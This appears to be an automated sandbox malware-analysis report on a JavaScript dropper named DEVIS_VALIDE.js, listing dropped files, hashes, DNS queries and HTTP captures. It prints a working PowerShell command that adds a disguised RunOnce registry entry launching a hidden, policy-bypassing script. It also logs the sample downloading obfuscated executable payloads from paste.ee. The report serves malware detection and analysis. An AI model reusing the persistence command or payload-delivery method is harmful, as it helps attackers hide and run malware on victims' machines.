Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with very long lines (431), with no line terminators
Category:	dropped
Size (bytes):	431
Entropy (8bit):	5.191164316064135
Encrypted:	false
SSDEEP:	6:jt2cVeDuwZH1j5tjo5inrcsny1R3KbQO0c+EkjAuwkn2nK1Mc15d55d55d55yF3w:jZ0VVjNYsngkbQpc++pfUrddy67
MD5:	D3CD18FE80CD2B0748AD3D85DDCD4E02
SHA1:	DC533882FB27C523ADE9B5A57E1CCCDA5DA93D2D
SHA-256:	FEDC838657BD07DF2B29611C1F31BB304F5830F67E7F42FE182587F41A1DE9FD
SHA-512:	767C2ADF726F0009E12B8270F643D461773849ACE4EF2D86C31DA3F95B3DEA240D45AD238B8B30C3FEA533CCEC02C7354884592D0A0A8F6F0BC62CF723D681B5
Malicious:	true
Preview:	Start-Sleep -Seconds 10; New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" -Name "Update Drivers NVIDEO_lme" -Value "cmd.exe /c start /min `"`" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command `". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' `";exit" -PropertyType "String" -force ; exit

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	323
Entropy (8bit):	5.363435887027673
Encrypted:	false
SSDEEP:	6:Q3La/xwcz92W+P12MUAvvr3tDLIP12MUAvvR+uTL2ql2ABgTv:Q3La/hz92n4M9tDLI4MWuPTAv
MD5:	A92E44C0313DAFEC1988D0D379E41A2F
SHA1:	C2F5644C418A81C1FB40F74298FF39D1420BFAC0
SHA-256:	F3F3E681BE07C36042639B1679ACF8B2D23BE037713D5E395C48006840DBE77A
SHA-512:	4F32FE6F35FC6EB4D4CF41EDEDE3C6B3FDFE31E58DA6FC7B301B1EBD3FBEEE64681C928B45E87CD556A1D32D32CB5932764EAB22FFEE11E42B8D5EB0DCFDC22C
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

File type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Entropy (8bit):	3.7597967870275233
TrID:	Text - UTF-16 (LE) encoded (2002/1) 66.67% MP3 audio (1001/1) 33.33%
File name:	DEVIS_VALIDE.js
File size:	203'946 bytes
MD5:	9feff1a23db299a128f16bc6091df793
SHA1:	2041542fb6ddc259c2888d587f75a06947d6c0dc
SHA256:	67c03094daa4c6180373eb864cb86f6ae156bc0481115d826917dd950f8e99d9
SHA512:	6de1016f37d3df9d6b428b19076ea34fe2e9db0bbe09aa9bbaa637237b8130b47fd119bb39274ec618b3e4238ccbf53a4e7a562e2c9c714b73c6392a6a1102c2
SSDEEP:	3072:AW1tKbWXt+NWXt+NWXt+NWXt+NWXt+NWXt+3WXt+NWXt+NWXt+NWXt+NWXt+NWXC:W
TLSH:	9B14413E13FD6284B5F34BAD761B11B05677B9696E3F01890076620C0EF2E40ADA5BB7
File Content Preview:	.././. .L.i.n.h.a. .1.:. .F.u.n.................o. .p.a.r.a. .s.o.m.a.r. .d.o.i.s. .n.........m.e.r.o.s....././. .L.i.n.h.a. .1.:. .F.u.n.................o. .p.a.r.a. .s.o.m.a.r. .d.o.i.s. .n.........m.e.r.o.s....././. .L.i.n.h.a. .1.:. .F.u.n............

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2024 11:06:12.049154043 CET	51797	53	192.168.2.4	1.1.1.1
Nov 20, 2024 11:06:12.716407061 CET	53	51797	1.1.1.1	192.168.2.4
Nov 20, 2024 11:06:15.739958048 CET	49852	53	192.168.2.4	1.1.1.1
Nov 20, 2024 11:06:15.747612000 CET	53	49852	1.1.1.1	192.168.2.4
Nov 20, 2024 11:06:25.485920906 CET	56004	53	192.168.2.4	1.1.1.1
Nov 20, 2024 11:06:25.493290901 CET	53	56004	1.1.1.1	192.168.2.4
Nov 20, 2024 11:06:26.324707985 CET	52735	53	192.168.2.4	1.1.1.1
Nov 20, 2024 11:06:26.370735884 CET	53	52735	1.1.1.1	192.168.2.4
Nov 20, 2024 11:06:37.261687994 CET	55935	53	192.168.2.4	1.1.1.1
Nov 20, 2024 11:06:37.270049095 CET	53	55935	1.1.1.1	192.168.2.4
Nov 20, 2024 11:06:42.820410967 CET	61173	53	192.168.2.4	1.1.1.1
Nov 20, 2024 11:06:42.940495014 CET	53	61173	1.1.1.1	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
2024-11-20 10:06:16 UTC	67	OUT	GET /d/I1o5h/0 HTTP/1.1 Host: paste.ee Connection: Keep-Alive
2024-11-20 10:06:16 UTC	1232	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 10:06:16 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B5%2FZE4Kz7nUsFRq5Z7schlcD529q5KWc0KQUKV9iuJNbSJr8YoOU9iFhWq9JKDufjayh5zdxg36WSZA7716%2FEq9OsjQHK2L8KL3bSq573tinf6OAZ%2BE1S1by6A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e57a058185dc443-EWR alt-svc: h3=":443"; ma=86400
2024-11-20 10:06:16 UTC	190	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 36 36 32 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 37 33 31 39 30 39 26 63 77 6e 64 3d 32 33 38 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 66 35 63 30 37 34 35 66 65 31 34 31 66 64 30 32 26 74 73 3d 32 31 37 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1662&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=1731909&cwnd=238&unsent_bytes=0&cid=f5c0745fe141fd02&ts=217&x=0"
2024-11-20 10:06:16 UTC	1369	IN	Data Raw: 32 66 37 66 0d 0a 54 56 71 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 2f 2f 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4c 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 Data Ascii: 2f7fTVqQ::M::::E:::://8::Lg:::::::::Q:::::::::::::
2024-11-20 10:06:16 UTC	1369	IN	Data Raw: 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 Data Ascii: :B:::B::::::E:::E::::::::B:::::::::::::::
2024-11-20 10:06:16 UTC	1369	IN	Data Raw: 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 e2 86 93 3a e2 86 93 75 63 6e 4e 79 59 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 67 44 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 59 e2 86 Data Ascii: M:::::I::::::::::::::::::C:::G:ucnNyYw:::GgD::::Y
2024-11-20 10:06:16 UTC	1369	IN	Data Raw: 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 6f 6f 43 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 69 6f e2 86 93 3a e2 86 93 45 7a e2 86 93 3a e2 86 93 44 e2 86 93 3a e2 86 93 45 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 Data Ascii: :::::::::::::::::::::::BooCw::Bio:Ez:D:E8::::::
2024-11-20 10:06:16 UTC	1369	IN	Data Raw: 86 93 e2 86 93 3a e2 86 93 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 51 4d 6f 43 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 6a 6b 66 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 48 59 30 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 4a 52 5a 79 30 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 63 42 6f 6f 44 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 71 49 6c 46 77 34 45 6f 69 55 59 63 67 55 42 e2 86 93 3a e2 86 93 48 e2 86 93 3a e2 86 93 62 4b e2 86 93 3a e2 86 93 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 61 69 4a 52 6b 5a 4b e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 61 69 4a 52 70 79 52 51 45 e2 86 93 3a e2 86 Data Ascii: :g::EQMoCQ::Cjkf:Q::HY0C:::BJRZy0w::cBooD:::BqIlFw4EoiUYcgUB:H:bK:w:::aiJRkZK:Q:::aiJRpyRQE:
2024-11-20 10:06:16 UTC	1369	IN	Data Raw: 3a e2 86 93 46 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 62 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 44 69 59 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 48 59 30 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 4a 52 5a 79 36 51 4d e2 86 93 3a e2 86 93 63 42 34 6f 44 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 71 49 6c 46 33 34 46 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 6f 69 55 59 63 67 30 45 e2 86 93 3a e2 86 93 48 e2 86 93 3a e2 86 93 57 4b e2 86 93 3a e2 86 93 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 61 69 4a 52 6b 64 4b 42 45 e2 86 93 3a e2 86 93 e2 86 Data Ascii: :F::::bg:::DiY::::HY0C:::BJRZy6QM:cB4oD:::BqIlF34F:::EoiUYcg0E:H:WK:w:::aiJRkdKBE:
2024-11-20 10:06:16 UTC	1369	IN	Data Raw: 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 46 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 62 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 48 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4a 77 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 46 73 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 46 e2 86 93 3a e2 86 93 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6c 77 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 6b 46 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 Data Ascii: :::FQ:::Bg::::b::::Hg::::M:g::JwI::FsC::CF:g::lwI::EkF:::
2024-11-20 10:06:16 UTC	1369	IN	Data Raw: 93 6f 7a 42 64 30 63 43 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 46 42 4d 4d 47 7a 68 6d 2f 2f 2f 2f 45 51 73 58 31 68 4d 4c 45 51 73 52 43 6f 35 70 4d 6f 33 64 68 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 55 6f 45 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 68 4d 4f 46 69 73 42 46 6b 55 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 57 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 Data Ascii: ozBd0cCQ::FBMMGzhm////EQsX1hMLEQsRCo5pMo3dh::::CUoEw::ChMOFisBFkUE:::::g::::o:::BM::::WQ:::C
2024-11-20 10:06:16 UTC	1215	IN	Data Raw: e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 73 5a 48 4a 6a 42 77 42 77 46 69 67 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 45 77 38 57 4b 77 45 57 52 51 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 48 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 73 72 46 78 63 6f 4a e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 67 67 52 42 42 45 50 42 69 67 46 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 4b 43 55 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 6d 46 79 76 57 63 73 73 48 e2 86 93 3a e2 86 93 48 e2 86 93 3a e2 86 93 59 4b Data Ascii: ::osZHJjBwBwFigM:::GEw8WKwEWRQI::::C::::HQ:::CsrFxcoJ:::CggRBBEPBigF:::GKCU:::omFyvWcssH:H:YK

Timestamp	Bytes transferred	Direction	Data
2024-11-20 10:06:24 UTC	67	OUT	GET /d/Nbuiz/0 HTTP/1.1 Host: paste.ee Connection: Keep-Alive
2024-11-20 10:06:25 UTC	1234	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 10:06:25 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=2592000 strict-transport-security: max-age=63072000 x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1; mode=block content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none' CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DwiOtSKgoabEJzjoPJ0AK8eqXdOIJ4Hdx%2BLEA%2BbQTadOWxoKGZ8ZnsO5H%2FB1Djd1O425Ih8rUFxbpDuc9V8E5Yof1XFxmbn%2FrwfwxedxxUDN7pq0MMr3oIkZ8g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e57a08dde2b7c81-EWR alt-svc: h3=":443"; ma=86400
2024-11-20 10:06:25 UTC	190	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 37 38 38 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 37 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 35 38 36 30 39 34 26 63 77 6e 64 3d 32 33 37 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 36 66 30 38 31 38 38 65 33 34 66 66 63 38 61 31 26 74 73 3d 34 36 31 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1788&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=681&delivery_rate=1586094&cwnd=237&unsent_bytes=0&cid=6f08188e34ffc8a1&ts=461&x=0"
2024-11-20 10:06:25 UTC	1314	IN	Data Raw: 66 37 66 0d 0a 54 56 71 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 2f 2f 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4c 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 Data Ascii: f7fTVqQ::M::::E:::://8::Lg:::::::::Q:::::::::::::
2024-11-20 10:06:25 UTC	1369	IN	Data Raw: 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 59 49 55 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 Data Ascii: ::::M:YIU::B:::B::::::E:::E::::::::B::::::::
2024-11-20 10:06:25 UTC	1291	IN	Data Raw: 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4c 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 e2 86 93 3a e2 86 93 75 63 6e 4e 79 59 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 Data Ascii: :::g::::Lg::::I::::::::::::::::::C:::G:ucnNyYw::
2024-11-20 10:06:25 UTC	1369	IN	Data Raw: 32 30 30 30 0d 0a 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 Data Ascii: 2000::::::::::::::::::::::::::::::::::::
2024-11-20 10:06:25 UTC	1369	IN	Data Raw: e2 86 93 6c e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 52 63 4c e2 86 93 3a e2 86 93 6e 34 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b e2 86 93 3a e2 86 93 78 63 6f 48 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 69 77 43 4b 77 6f 48 46 39 59 4c 42 78 73 78 35 79 73 45 46 77 6f 72 e2 86 93 3a e2 86 93 68 59 4b 42 69 6f e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 62 4d e2 86 93 3a e2 86 93 73 e2 86 93 3a e2 86 93 45 51 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 46 79 4d 51 e2 86 93 3a e2 86 93 Data Ascii: l:::::Q::ERcL:n4g:::K:xcoH:::BiwCKwoHF9YLBxsx5ysEFwor:hYKBio::::bM:s:EQQ:::I::BFyMQ:
